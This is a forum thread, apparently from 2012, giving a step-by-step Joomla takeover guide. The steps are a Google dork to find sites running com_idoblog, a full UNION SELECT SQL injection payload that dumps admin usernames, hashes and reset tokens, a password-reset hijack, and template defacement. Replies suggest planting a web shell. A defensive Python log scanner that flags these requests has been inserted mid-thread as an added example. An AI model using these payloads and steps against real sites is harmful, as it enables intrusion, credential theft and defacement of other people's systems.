Hacking Administrator Joomla – Get Full Access!
05-23-2012, 08:43 PM
(This post was last modified: 05-23-2012 08:48 PM by Mr.Sign.)
Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge

Finding Exploit And Target

Those two steps could go in a different order, depending on what you find first, target or exploit…

Google dork: inurl:”option=com_idoblog”
Comes up with results for about 140,000 pages

At inj3ct0r.com search for: com_idoblog
Gives us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

== Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln ==
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16+from+jos_users–

Exploit can be separated in two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opens the blog Admin page, and if the Admin page doesn’t exist, the exploit won’t work (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–
This part looks for username and password in the jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox] Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

Follow standard steps until you find Column Name, as a result we have

Notice that the exploit from inj3ct0r wouldn’t work here because it is looking for the jos_users table and, as you can see, our target uses the jos153_users table for storing data

Let’s dump username, email, password from Column Name jos153_users.
Click on Dump Now

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a 32 character salt that is appended to the end of the password string. The password is stored as {TOTAL HASH}:{ORIGINAL SALT}. So to hack that password takes time and time… The easiest way to hack is to reset the Admin password!

Admin Password Reset

Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset

The Forgot your Password? page will load. In E-mail Address: enter the admin email (in our case it is: info@site.com) and press Submit.
If you found the right admin email, the Confirm your account. page will load, asking for a Token

Finding Token

To find the token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is the 32 char verification token, enter it and press Submit.

If you have done everything OK, the Reset your Password page will load. Enter your new password…

After that go to:
Code:
http://www.site.com/administrator/

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

To make admin life more miserable, click on admin in the main Joomla window and in the User Details page change the admin E-mail

Credit: MindFreak [HckGuide]
Reputed by: adoet_t(+1), ubuntux(+1), nggodress(+1), whiteshen(+1)
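
Seen from the defender's side, the requests in the post above leave a recognisable trace in web server access logs: a `userid` value on `com_idoblog` that is not a plain integer, followed by a hit on the `com_user` reset view from the same client. An added example (not part of the original post) that flags both; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined format, documentation-range IPs).
SAMPLE_LOG = """\
198.51.100.7 - - [23/May/2012:20:43:01 +0000] "GET /index.php?option=com_idoblog&view=idoblog&Itemid=22 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [23/May/2012:20:44:10 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62 HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.9 - - [23/May/2012:20:44:15 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1-- HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
203.0.113.9 - - [23/May/2012:20:50:02 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 2980 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<uri>\S+) [^"]*"')
SQL_WORDS = re.compile(r"\b(union|select|concat|from|information_schema)\b|--|/\*", re.I)

def classify(uri):
    """Return a finding label for one request URI, or None if nothing stands out."""
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)  # decodes + and %xx
    option = params.get("option", [""])[0]
    if option == "com_idoblog":
        for value in params.get("userid", []):
            if not value.isdigit():  # a profile id should only ever be an integer
                return "idoblog-userid-" + ("sqli" if SQL_WORDS.search(value) else "non-numeric")
    if option == "com_user" and params.get("view", [""])[0] == "reset":
        return "password-reset-view"
    return None

def scan(log_text):
    """Return (ip, timestamp, label) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        label = classify(m.group("uri")) if m else None
        if label:
            findings.append((m.group("ip"), m.group("ts"), label))
    return findings

def injection_then_reset(findings):
    """IPs that requested the reset view after a flagged userid (the post's sequence)."""
    flagged, suspects = set(), []
    for ip, _, label in findings:
        if label.startswith("idoblog-userid"):
            flagged.add(ip)
        elif ip in flagged and ip not in suspects:
            suspects.append(ip)
    return suspects

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    print(hits, injection_then_reset(hits), sep="\n")
```

A request for the reset view on its own is ordinary user behaviour; it is the pairing with a flagged `userid` from the same address that warrants checking the admin account's e-mail, password hash and template files for changes.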
05-23-2012, 09:09 PM
RE: Hacking Administrator Joomla – Get Full Access!
Nice article, but I hate the defacing part :S Any chance to shell it?
05-23-2012, 09:13 PM
RE: Hacking Administrator Joomla – Get Full Access!
nice.. cendol send...
05-23-2012, 09:28 PM
RE: Hacking Administrator Joomla – Get Full Access!
05-23-2012, 09:31 PM
RE: Hacking Administrator Joomla – Get Full Access!
Thanks for your article and this PoC
05-23-2012, 09:31 PM
RE: Hacking Administrator Joomla – Get Full Access!
Just put a shell in when editing the theme
(use a theme that is not set as the default so it doesn't immediately affect the index). The shell's address will be at domain.com/templates/nama_template/index.php CMIIW
05-23-2012, 09:36 PM
RE: Hacking Administrator Joomla – Get Full Access!
What do you do if you find a token with salt?
05-23-2012, 09:59 PM
RE: Hacking Administrator Joomla – Get Full Access!
Bro..... let me ask permission first, okay...
05-24-2012, 12:22 PM
(This post was last modified: 05-24-2012 01:15 PM by ohara_inamiji.)
RE: Hacking Administrator Joomla – Get Full Access!
(05-23-2012 09:31 PM)keyB0T Wrote: Just put a shell in when editing the theme

That's only if it can be edited. The shell can only be installed if the template is writable... btw thanks to the thread starter for the PoC. For friends who want to avoid SQLi attacks, you can use htaccess... the how-to is in this thread http://devilzc0de.org/forum/thread-13119.html
05-24-2012, 05:07 PM
RE: Hacking Administrator Joomla – Get Full Access!
Bro, permission to try this out